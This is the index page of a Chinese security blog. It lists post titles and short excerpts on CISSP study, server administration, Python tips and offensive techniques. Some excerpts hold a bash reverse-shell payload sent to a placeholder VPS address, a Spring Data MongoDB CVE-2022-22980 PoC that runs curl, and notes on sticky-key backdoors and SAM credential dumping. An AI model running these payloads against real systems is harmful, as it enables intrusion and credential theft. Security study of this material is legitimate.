2025年3月24日
常见开源威胁情报源
摘要: https://www.cnblogs.com/iAmSoScArEd/p/18790153 我超怕的 国外 (部分非开源,但有免费查询额度) ThreatMiner :IPv4、FQDN、MD5、SHA2 Alienvault :IPv4、MD5、SHA2 IBM X-Force :IPv4 Vi 阅读全文
posted @ 2025-03-24 20:56 我超怕的 阅读(3) 评论(0) 推荐(0) 编辑
留坑待踩:osquery
摘要: https://www.cnblogs.com/iAmSoScArEd/p/18790130 osquery 用于采集操作系统网络、进程、用户等数据,并提供SQL语法查询各种信息,用于入侵检测、应急响应场景使用。 https://www.osquery.io/ 留位置,待实际部署踩坑。 阅读全文
posted @ 2025-03-24 20:47 我超怕的 阅读(2) 评论(0) 推荐(0) 编辑
安全各类LLM提示词(不定期更新)
摘要: 我超怕的-https://www.cnblogs.com/iAmSoScArEd/p/18789376 自己平时使用写的,会根据实际使用情况更新,不全,欢迎补充、优化。 代码审计 你是一名经验丰富的代码审计专家,你有以下能力: 1、你精通Java、Python、Go等各类主流语言。 2、你知道各类语 阅读全文
posted @ 2025-03-24 14:14 我超怕的 阅读(3) 评论(0) 推荐(0) 编辑
2024年12月31日
CISSP备考经验分享2024年12月
摘要: https://www.cnblogs.com/iAmSoScArEd/p/18644021 我超怕的 CISSP备考经验分享2024年12月 考试过了,以下是我的备考经历,不一定适合所有人,所以请按照自己的习惯备考。 补充 2025.03.17 关于报名:我是给自己留了3个月时间备考,选了3个月后 阅读全文
posted @ 2024-12-31 14:50 我超怕的 阅读(191) 评论(0) 推荐(0) 编辑
2024年12月1日
CISSP错题或模糊知识(未整理)
摘要: 我超怕的- https://www.cnblogs.com/iAmSoScArEd/p/18579786 考试已经通过了,停止更新,感谢。 具有公共IP 地址的数据包通常会被允许进入网络,因此您不应创建规则来阻止它们。 具有内部源地址的数据包不应来自网络外部,因此应阻止它们进入网络。 具有外部源地址 阅读全文
posted @ 2024-12-01 14:39 我超怕的 阅读(124) 评论(0) 推荐(0) 编辑
2024年11月29日
CISSP错题知识点整理
摘要: 我超怕的-CISSP错题知识点整理-https://www.cnblogs.com/iAmSoScArEd/p/18576720 考试已经通过了,停止更新,感谢。 1. RADIUS (Remote Authentication Dial-In User Service) 功能 主要功能: 集中式身 阅读全文
posted @ 2024-11-29 14:39 我超怕的 阅读(136) 评论(0) 推荐(0) 编辑
2024年11月14日
Linux HTTP代理Squid 基本配置及目标白名单方式限制转发
摘要: Linux HTTP代理Squid 基本变更配置及目标白名单方式限制转发 https://www.cnblogs.com/iAmSoScArEd/p/18546341 大部分保持默认即可 1、文件管理转发白名单 sudo touch /etc/squid/whitelistip sudo touch 阅读全文
posted @ 2024-11-14 16:46 我超怕的 阅读(162) 评论(0) 推荐(0) 编辑
2024年10月29日
Grafana Nginx 403 Origin not allowed 及 ws websocket连接错误解决
摘要: Grafana Nginx 403 Origin not allowed 及 ws websocket错误解决 我超怕的 https://www.cnblogs.com/iAmSoScArEd/p/18514291 注意,这里日志并不全,仅贴了关键解决问题的部分,请勿直接复制粘贴用于生产环境。 ht 阅读全文
posted @ 2024-10-29 19:56 我超怕的 阅读(238) 评论(0) 推荐(0) 编辑
2024年5月31日
Nginx:a client request body is buffered to a temporary file
摘要: https://www.cnblogs.com/iAmSoScArEd/p/18225191 Nginx warn: 2024/05/31 19:28:37 [warn] 8467#0: *9505669 a client request body is buffered to a temporar 阅读全文
posted @ 2024-05-31 19:37 我超怕的 阅读(587) 评论(0) 推荐(0) 编辑
2024年4月17日
批量扫描并上报所有服务器已信任的authorized_keys
摘要: https://www.cnblogs.com/iAmSoScArEd/p/18140656 - 我超怕的 code from flask import Flask, request import csv app = Flask(__name__) @app.route('/', methods=[ 阅读全文
posted @ 2024-04-17 14:26 我超怕的 阅读(41) 评论(0) 推荐(0) 编辑
2023年10月7日
Python简易HTTP文件服务器
摘要: 我超怕的 - HTTP simple file server use Python - https://www.cnblogs.com/iAmSoScArEd/p/17745959.html How to use 安装依赖:pip3 install flask 保存到文本simple_file_se 阅读全文
posted @ 2023-10-07 11:50 我超怕的 阅读(203) 评论(0) 推荐(0) 编辑
2023年9月25日
Linux服务器全用户文件外发行为检测
摘要: 我超怕的 -https://www.cnblogs.com/iAmSoScArEd/p/17727571.html Code #!/bin/bash # Specify the directory where user home directories are located USER_HOME_D 阅读全文
posted @ 2023-09-25 11:25 我超怕的 阅读(65) 评论(0) 推荐(0) 编辑
2023年4月13日
通过进程树监控 Web 应用程序代码执行的命令
摘要: 我超怕的 - https://www.cnblogs.com/iAmSoScArEd/p/17315419.html 要通过进程树监控 Web 应用程序代码执行的命令,可以按照以下步骤进行操作: 打开终端,并查找正在运行的 Web 应用程序的进程 ID。 ps -ef | grep -i <appl 阅读全文
posted @ 2023-04-13 16:50 我超怕的 阅读(87) 评论(0) 推荐(0) 编辑
2023年4月4日
权限维持&后门方向速查清单
摘要: 我超怕的 - https://www.cnblogs.com/iAmSoScArEd/p/17287883.html Windows主机后门 1、粘滞键 替换c:\windows\system32\sethc.exe 为后门程序 2、注册表 HKCU:Software\Microsoft\Windo 阅读全文
posted @ 2023-04-04 20:55 我超怕的 阅读(131) 评论(0) 推荐(0) 编辑
2023年3月14日
CISSP 思维导图(考试通过,停止更新)
摘要: 我超怕的 https://www.cnblogs.com/iAmSoScArEd/p/17213464.html 内容及备注:OSG 第一遍 什么时候看:学完速刷回忆 以后用快查 考试已经通过了,考试经验分享:https://www.cnblogs.com/iAmSoScArEd/p/1864402 阅读全文
posted @ 2023-03-14 00:29 我超怕的 阅读(44034) 评论(0) 推荐(0) 编辑
2023年3月8日
内网横向攻击提权、命令执行常见工具/渠道
摘要: https://www.cnblogs.com/iAmSoScArEd/p/17189780.html 我超怕的 票据传递提权 1、mimikatz主机密码获取、破解、NTLM Hash获取、Hash传递 2、kekeo票据传递 PsExec提权 1、PsExec 在存在ipc的环境下获取目标主机s 阅读全文
posted @ 2023-03-08 21:13 我超怕的 阅读(367) 评论(0) 推荐(0) 编辑
2023年3月7日
Windows系统LM Hash和NTLM Hash凭证获取方法速查
摘要: 我超怕的 https://www.cnblogs.com/iAmSoScArEd/p/17169904.html 凭证获取需要System权限。 1、使用GetPass工具 2、使用PwDump7工具 3、使用QuarksPwDump工具(报毒) 4、使用命令导出 reg save hklm\sam 阅读全文
posted @ 2023-03-07 20:40 我超怕的 阅读(326) 评论(0) 推荐(0) 编辑
2023年2月26日
横向移动之利用Windows IPC连接执行无图形界面命令行操作
摘要: https://www.cnblogs.com/iAmSoScArEd/p/17156938.html 我超怕的 IPC(Internet Process Connection),用于进程间通信的命名管道。连接目标时需要验证用户名和密码,可以访问目标机器的文件、目录结构、用户等信息。 需要目标机器启 阅读全文
posted @ 2023-02-26 16:23 我超怕的 阅读(170) 评论(0) 推荐(0) 编辑
2023年2月20日
Windows内网本地提权的十个方向
摘要: https://www.cnblogs.com/iAmSoScArEd/p/17139141.html 我超怕的 前言:仅记录思路方向,具体技术细节可遇到后对照深入研究。如果有补充,非常欢迎大家评论、留言。 1、利用Windows系统漏洞 匹配可提权漏洞编号,系统是否缺失该补丁。 1、人工查用sys 阅读全文
posted @ 2023-02-20 22:02 我超怕的 阅读(402) 评论(0) 推荐(0) 编辑
2023年2月17日
go源码编译步骤
摘要: cd到源码根目录 1、初始化模块,生成依赖module文件go.modgo mod init 源码根目录名 2、下载依赖module go get 3、编译源码,生成可执行文件 go build 后续更新代码,若无外部依赖,可直接go build生成可执行文件,不需要重复执行初始化操作。若新增外部依 阅读全文
posted @ 2023-02-17 20:17 我超怕的 阅读(197) 评论(0) 推荐(0) 编辑
2023年2月14日
ssh隧道
摘要: 来自我超怕的 - https://www.cnblogs.com/iAmSoScArEd/p/17120954.html ssh在线官方命令详解 https://man.openbsd.org/ssh 也可以执行 man ssh查看详细命令 为什么选择通过SSH隧道转发? 隐蔽、普遍。 1、本地转发 阅读全文
posted @ 2023-02-14 21:42 我超怕的 阅读(289) 评论(0) 推荐(0) 编辑
2023年2月9日
netcat入门指南及nc后门的常见利用方式
摘要: netcat入门指南及nc后门的几种利用方式 来自 https://www.cnblogs.com/iAmSoScArEd/p/17103315.html - 我超怕的 1、查看nc工具帮助信息 nc -h #后期可以通过该命令查看已经忘记的命令参数,也可以用来探索具体有哪些功能 2、获取部分端口B 阅读全文
posted @ 2023-02-09 22:08 我超怕的 阅读(573) 评论(0) 推荐(0) 编辑
2022年7月15日
spring data mongodb remote code execution | cve-2022-22980 poc
摘要: spring data mongodb remote code execution | cve-2022-22980 poc # 原payload# T(java.lang.Runtime).getRuntime().exec("curl http://xxx/success") URLencode 阅读全文
posted @ 2022-07-15 14:42 我超怕的 阅读(258) 评论(0) 推荐(0) 编辑
2022年7月13日
Linux 统计指定目录下文件数量
摘要: # 修改 ./ 为指定路径即可,下面命令默认为当前目录 for i in ./*; do echo $i; find $i | wc -l; done 阅读全文
posted @ 2022-07-13 15:49 我超怕的 阅读(190) 评论(0) 推荐(0) 编辑
2022年6月17日
Google MFA+Jumpserver自动连接登录
摘要: Google MFA+Jumpserver自动连接 - https://www.cnblogs.com/iAmSoScArEd/p/16387057.html 我超怕的 1、先安装expect Linux CentOS:yum install expect Linux Ubuntu:apt inst 阅读全文
posted @ 2022-06-17 21:07 我超怕的 阅读(1001) 评论(0) 推荐(0) 编辑
Python获取本周指定的星期几
摘要: https://www.cnblogs.com/iAmSoScArEd/p/16386216.html 我超怕的 获取本周星期一 import datetime print(datetime.date.today()-datetime.timedelta(days=datetime.date.tod 阅读全文
posted @ 2022-06-17 16:32 我超怕的 阅读(504) 评论(0) 推荐(0) 编辑
siege Web压测工具安装、基础使用
摘要: https://www.cnblogs.com/iAmSoScArEd/p/16386193.html 我超怕的 下载安装 #下载最新版 wget http://download.joedog.org/siege/siege-latest.tar.gz # 解压 tar -zxvf siege-la 阅读全文
posted @ 2022-06-17 16:28 我超怕的 阅读(104) 评论(0) 推荐(0) 编辑
2022年5月12日
Python Mysql unsupported format character 'Y' (0x59) at index xx
摘要: https://www.cnblogs.com/iAmSoScArEd/p/16264440.html - 我超怕的 报错:Python Mysql unsupported format character 'Y' (0x59) at index xx 报错代码 sql = ''' SELECT D 阅读全文
posted @ 2022-05-12 21:24 我超怕的 阅读(878) 评论(0) 推荐(0) 编辑
2022年4月16日
LeetCode 代码记录
摘要: 我怕超的 - https://www.cnblogs.com/iAmSoScArEd/p/16153162.html 1. 两数之和 https://leetcode-cn.com/problems/two-sum/ 给定一个整数数组 nums 和一个整数目标值 target,请你在该数组中找出 和 阅读全文
posted @ 2022-04-16 16:02 我超怕的 阅读(81) 评论(0) 推荐(0) 编辑
2022年2月15日
日志路径及日志分析技巧
摘要: 日志默认存放位置:/var/log/ 查看日志配置情况:more /etc/rsyslog.conf 日志文件说明 /var/log/cron 记录了系统定时任务相关的日志 /var/log/cups 记录打印信息的日志 /var/log/dmesg 记录了系统在开机时内核自检的信息,也可以使用dm 阅读全文
posted @ 2022-02-15 18:07 我超怕的 阅读(912) 评论(0) 推荐(0) 编辑
2022年1月6日
Java任意命令执行漏洞bash反弹shell Payload
摘要: 通常1不能直接获取反弹Shell,实战中4很好用 1 bash -i >& /dev/tcp/你的vps ip/监听端口 0>&1 #大部分情况直接执行这个命令不能弹,用下面的 2 Runtime.getRuntime().exec("/bin/bash -c bash${IFS}-i${IFS}> 阅读全文
posted @ 2022-01-06 18:47 我超怕的 阅读(1509) 评论(0) 推荐(0) 编辑
2021年12月22日
使新添加的.gitignore生效
摘要: 进入项目目录后 删除缓存 git rm -r --cached . 添加所有文件 git add . commit后生效 git commit -m "make .gitignore work" 阅读全文
posted @ 2021-12-22 16:33 我超怕的 阅读(127) 评论(0) 推荐(0) 编辑
2021年11月25日
关于netcat(nc)开启监听有趣的发现
摘要: 来自-https://www.cnblogs.com/iAmSoScArEd/p/15602016.html -我超怕的 大家都知道用nc开启本机端口监听的命令是:nc -l -v -p 6666 都知道-l是开启监听,-v打印运行时的所有信息,-p指定端口 通常合起来写:nc -lvp 6666 阅读全文
posted @ 2021-11-25 11:45 我超怕的 阅读(1428) 评论(0) 推荐(2) 编辑
2021年7月30日
Python3 安装suds失败问题解决
摘要: 对于Python3错误: AttributeError: module 'suds' has no attribute 'client' Python3 安装suds失败问题解决: pip uninstall suds pip uninstall client pip install suds-py 阅读全文
posted @ 2021-07-30 12:15 我超怕的 阅读(315) 评论(0) 推荐(0) 编辑
2021年6月19日
Python pyMongoDB 基础使用模版
摘要: Python pyMongoDB基础使用 - https://www.cnblogs.com/iAmSoScArEd/p/14903131.html -我超怕的 当不知道MongoDB中有什么数据库时可使用以下函数查询所有数据库: print(client.database_names()) 当不知 阅读全文
posted @ 2021-06-19 15:47 我超怕的 阅读(163) 评论(0) 推荐(0) 编辑
2021年5月29日
CTF PHP代码审计之常见Hash总结
摘要: CTF PHP代码审计之常见Hash总结 -https://www.cnblogs.com/iAmSoScArEd/p/14825040.html 我超怕的 一、MD4 1.1 $a=md4($a) 解决: url?a=0e251288019 url?a=0e898201062 url?a=0e00 阅读全文
posted @ 2021-05-29 12:55 我超怕的 阅读(661) 评论(0) 推荐(0) 编辑
2021年5月24日
SNMP快速上手获取信息的基础指令
摘要: https://www.cnblogs.com/iAmSoScArEd/p/14805484.html - 我超怕的 1、遍历所有OID snmpwalk -c public -v 2c -O fn xxx.xxx.xxx.xxx .1 xxx.xxx.xxx.xxx为IP 2、查看某个OID的内容 阅读全文
posted @ 2021-05-24 17:50 我超怕的 阅读(456) 评论(0) 推荐(0) 编辑
2021年5月21日
Python四分位和中位数计算代码
摘要: Python四分位和中位数计算代码- https://www.cnblogs.com/iAmSoScArEd/p/14832474.html -我超怕的 ############ # Name:计算四分位和中位数 # Author:我超怕的 # Date:2021-05-21 ########### 阅读全文
posted @ 2021-05-21 17:44 我超怕的 阅读(1876) 评论(0) 推荐(0) 编辑
2021年3月16日
Android 7.0版本以上突破证书限制HTTPS抓包
摘要: 针对Android 7.0及以上版本的系统,不信任用户添加的证书,无法抓HTTPS包问题的解决方法。 1、使用XPosed框架(不root选择virtualXposed)+JustTrustMe :https://www.cnblogs.com/xiaochao-testing/p/13985602 阅读全文
posted @ 2021-03-16 11:25 我超怕的 阅读(498) 评论(2) 推荐(0) 编辑
2021年3月2日
网络信息安全管理流程
摘要: 网络信息安全管理流程 - https://www.cnblogs.com/iAmSoScArEd/p/14471402.html - 我超怕的 内容来自《信息安全工程师教程》 网络信息安全管理一般遵循如下工作流程: 1、确定网络信息安全管理对象 2、评估网络信息安全管理对象的价值 3、识别网络信息安 阅读全文
posted @ 2021-03-02 21:30 我超怕的 阅读(1241) 评论(0) 推荐(0) 编辑
下一页
点击右上角即可分享
微信分享提示